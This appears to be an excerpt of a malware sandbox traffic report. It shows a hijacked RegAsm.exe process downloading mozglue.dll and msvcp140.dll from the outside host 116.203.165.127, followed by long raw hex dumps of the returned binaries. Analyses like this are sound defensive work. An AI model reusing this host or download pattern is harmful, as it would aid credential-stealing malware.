                                                                                                                                                                                                                                        Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                                        2024-09-21 12:49:04 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                                                                                        Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        20192.168.2.949763116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:05 UTC199OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:05 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:05 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                                                                                        Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                                                                                        Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                                                                                        Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                                                                                        Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                                                                                        Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                                                                                        Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                                                                                        Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                                        2024-09-21 12:49:06 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                                                                                        Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        21192.168.2.949765116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:07 UTC200OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:07 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:07 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                                                                                        Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                                                                                        Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                                                                                        Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                                                                                        Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                                                                                        Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                                                                                        Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
